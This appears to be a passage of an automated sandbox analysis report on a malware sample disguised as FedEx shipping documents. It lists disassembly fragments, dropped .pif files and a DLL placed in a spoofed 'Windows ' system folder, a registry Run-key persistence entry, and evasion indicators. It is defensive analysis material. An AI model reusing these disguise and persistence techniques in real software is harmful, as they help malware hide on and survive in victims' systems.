        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D53240 push eax; ret 0_2_02D5327C
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5C23E push 02D5C696h; ret 0_2_02D5C68E
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D760AC push 02D76125h; ret 0_2_02D7611D
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D64010 push 02D64048h; ret 0_2_02D64040
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D66018 push 02D66050h; ret 0_2_02D66048
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D6400E push 02D64048h; ret 0_2_02D64040
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D561C0 push 02D56202h; ret 0_2_02D561FA
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D761F8 push 02D76288h; ret 0_2_02D76280
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D561BE push 02D56202h; ret 0_2_02D561FA
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D76144 push 02D761ECh; ret 0_2_02D761E4
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5F677 push 02D5F6C5h; ret 0_2_02D5F6BD
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5F678 push 02D5F6C5h; ret 0_2_02D5F6BD
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D62488 push ecx; mov dword ptr [esp], edx0_2_02D6248A
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5F56C push 02D5F5E2h; ret 0_2_02D5F5DA
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5C510 push 02D5C696h; ret 0_2_02D5C68E
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D6A8B4 push ecx; mov dword ptr [esp], edx0_2_02D6A8B9
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D6A918 push ecx; mov dword ptr [esp], edx0_2_02D6A91D
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5BE90 push ecx; mov dword ptr [esp], edx0_2_02D5BE95
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5CE58 push 02D5CE84h; ret 0_2_02D5CE7C
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D62F54 push 02D62FFFh; ret 0_2_02D62FF7
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D62F52 push 02D62FFFh; ret 0_2_02D62FF7
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D55DF4 push 02D55E4Fh; ret 0_2_02D55E47
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D55DF2 push 02D55E4Fh; ret 0_2_02D55E47
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D63DB8 push 02D63DFAh; ret 0_2_02D63DF2
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D75D08 push 02D75EE4h; ret 0_2_02D75EDC
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_3_2BDC08E8 push es; iretd 7_3_2BDC08F7
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_3_2BDC08E8 push es; iretd 7_3_2BDC08F7
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_3_2BDB70E0 push es; iretd 7_3_2BDB712A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_3_2BDBF384 pushad ; retf 7_3_2BDBF385
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_3_2BDBF384 pushad ; retf 7_3_2BDBF385

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Users\Public\Libraries\hzwdvhxM.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Users\Public\Libraries\Mxhvdwzh.PIFJump to dropped file
        Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Users\Public\Libraries\hzwdvhxM.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Users\Public\Libraries\Mxhvdwzh.PIFJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to dropped file
        Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
        Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to dropped file

        Boot Survival

        barindex
        Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\ndpha.pifJump to dropped file
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MxhvdwzhJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MxhvdwzhJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D66490 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02D66490
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\ndpha.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 3040000 memory commit 500068352Jump to behavior
